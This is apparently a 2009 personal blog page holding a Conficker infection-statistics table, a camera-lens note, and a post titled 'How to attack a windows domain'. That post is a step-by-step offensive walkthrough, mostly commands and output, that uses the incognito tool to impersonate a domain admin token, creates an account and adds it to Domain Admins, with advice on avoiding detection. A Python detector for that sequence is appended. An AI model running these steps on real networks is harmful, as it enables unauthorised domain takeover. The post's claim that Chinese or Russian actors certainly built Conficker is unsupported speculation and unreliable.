Old New Dream

October 8, 2009

R u Conficker Today?

Filed under: Uncategorized — oldnewdream @ 9:31 PM

The daily trend of the Conficker worm.

Day        Date        Total HTTP Hits  Unique IPs   Unique ASNs   Unique GEOs
Monday     2009-10-05      353,374,228    6,177,806        12,578           225
Sunday     2009-10-04      319,116,909    5,848,210        11,625           224
Saturday   2009-10-03      345,899,815    6,115,205        11,740           223
Friday     2009-10-02      324,444,402    5,903,585        12,420           225
Thursday   2009-10-01      311,329,747    6,161,260        12,562           225
Wednesday  2009-09-30      271,927,387    6,370,343        12,584           225
Tuesday    2009-09-29      321,617,133    6,419,746        12,560           224
Monday     2009-09-28      298,942,625    5,784,097        12,335           225
Sunday     2009-09-27      381,931,460    5,893,814        11,595           223
Saturday   2009-09-26      373,511,716    5,991,939        11,656           221
Friday     2009-09-25      420,454,010    6,349,116        12,466           225
Thursday   2009-09-24      359,456,435    6,190,332        12,546           224
Wednesday  2009-09-23      365,905,240    6,344,510        12,490           224
Tuesday    2009-09-22      412,112,235    6,317,103        12,555           224
Monday     2009-09-21      402,866,723    6,228,450        12,480           224
Sunday     2009-09-20      341,461,136    5,718,952        11,621           223
Saturday   2009-09-19      409,631,897    5,960,625        11,714           223
Friday     2009-09-18      395,422,099    6,173,654        12,477           223
Thursday   2009-09-17      429,063,096    6,402,387        12,599           223
Wednesday  2009-09-16      404,947,612    6,239,897        12,599           223
Tuesday    2009-09-15      435,608,525    6,443,852        12,556           223
Monday     2009-09-14      427,108,902    6,420,308        12,530           226
Sunday     2009-09-13      381,846,846    5,769,241        11,617           222
Saturday   2009-09-12      367,351,330    5,958,670        11,706           222
Friday     2009-09-11      217,895,581    5,763,953        12,176           224
Thursday   2009-09-10      323,857,258    6,299,152        12,380           223
Wednesday  2009-09-09      323,932,481    6,346,391        12,525           224
Tuesday    2009-09-08      267,769,518    6,233,405        12,444           223
Monday     2009-09-07      300,297,749    6,140,995        11,948           224
Sunday     2009-09-06      267,938,003    5,647,851        11,182           223

http://www.theregister.co.uk/2009/10/03/conficker_infects_oxford_brookes/

After reading the Deep Analysis of Conficker, we can be 99% sure this worm was crafted by the Chinese/Russians… Only they have the resources and rigid process flow to come up with such an amazing worm.
We can even be sure there is a User Experience team that refines the worm and makes it simpler to use/attack.

Have you patched MS08-067 today?

GF-1 Autofocus Lenses

Filed under: Uncategorized — oldnewdream @ 6:56 AM

Who says the GF-1 has very limited AF lens support?
Update the Zuiko 1442 firmware… and that Oly lens focuses way, way faster on the GF-1 than on the slow EP-1!!!

Take that, Oly fans!!!

Here is the whole list of lenses supported by the GF-1:

http://panasonic.jp/support/global/cs/dsc/connect/g1.html

October 3, 2009

How to attack a windows domain

Filed under: Uncategorized — oldnewdream @ 10:05 AM

Get administrator rights on a workstation that is on a Windows domain using whatever method you can find (exploit, stolen password, SMB relay, phishing, etc.). Look for the domain server. There are a variety of ways to do this. You can use arp -a to find active IPs or ping-scan the network, then use the nbtstat tool to look for the domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Acquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
BLACKHAT\Domain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins:

C:\WINDOWS\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin_valsmith           Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Let's say the workstation we hacked is on 172.16.1.10. We now need to find out if there are any security tokens we can access.

c:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[*] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found…

Delegation Tokens Available
==========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPCLIENT\local_valsmith

Impersonation Tokens Available
==========================================
BLACKHAT\admin_valsmith
NT AUTHORITY\ANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. It connects to the IPC$ share on the target and lists any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhat\admin_valsmith" cmd

[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[+] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:\>net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the Domain Admins group. NOTE: often you don't want to add an account, especially one named hacked, as it is likely to be discovered by the admins.

C:\>net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.
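The defender's side of the sequence above, as an added example that is not part of the original post or of the incognito tool: a small Python detector run over constructed Windows event records, flagging a service installed from a temp path on the workstation (System log 7045), and a domain account that is created (Security log 4720) and added to a privileged group (4728) within minutes. The event IDs are real Windows log IDs; the JSON field names, hosts, account names, timestamps and the ten-minute window are assumptions made for the example.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed Windows event records (JSON lines, as a log forwarder might
# emit them), modelled on the walkthrough above: a service is pushed to the
# workstation, a new domain account is created on the DC, and seconds later
# it is added to Domain Admins. Hosts, names and timestamps are made up.
SAMPLE_EVENTS = """\
{"EventID": 7045, "TimeCreated": "2009-10-03T10:01:05", "Computer": "XPCLIENT", "ServiceName": "svc_tmp", "ImagePath": "C:\\\\WINDOWS\\\\Temp\\\\svc.exe"}
{"EventID": 4720, "TimeCreated": "2009-10-03T10:02:10", "Computer": "DC01", "SubjectUserName": "admin_valsmith", "TargetUserName": "hacked"}
{"EventID": 4728, "TimeCreated": "2009-10-03T10:02:41", "Computer": "DC01", "SubjectUserName": "admin_valsmith", "MemberName": "hacked", "TargetUserName": "Domain Admins"}
{"EventID": 4728, "TimeCreated": "2009-10-03T15:30:00", "Computer": "DC01", "SubjectUserName": "helpdesk", "MemberName": "jsmith", "TargetUserName": "Print Operators"}
"""

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
PROMOTION_WINDOW = timedelta(minutes=10)  # assumed: 4720 -> 4728 gap treated as suspicious
TEMP_PATH = re.compile(r"\\(temp|tmp|users|documents and settings)\\", re.IGNORECASE)


def parse_events(text):
    """Parse JSON-lines records and attach a datetime so they can be ordered."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.fromisoformat(ev["TimeCreated"])
            events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect(text):
    """Return a list of (rule, subject) alerts for the event stream."""
    alerts = []
    created = {}  # account name -> time of its 4720 creation event
    for ev in parse_events(text):
        eid = ev["EventID"]
        if eid == 7045 and TEMP_PATH.search(ev.get("ImagePath", "")):
            # Remote service-execution tools stage a binary and register a service for it.
            alerts.append(("service_from_temp_path", ev["Computer"]))
        elif eid == 4720:
            created[ev["TargetUserName"].lower()] = ev["ts"]
        elif eid in (4728, 4732):  # member added to a global / local security group
            member = ev["MemberName"].lower()
            if ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
                alerts.append(("privileged_group_add", member))
                if member in created and ev["ts"] - created[member] <= PROMOTION_WINDOW:
                    alerts.append(("new_account_promoted_quickly", member))
    return alerts
```

Running detect(SAMPLE_EVENTS) yields three alerts for the constructed stream; the helpdesk change to Print Operators is not flagged, since that group is outside the privileged set.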

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf
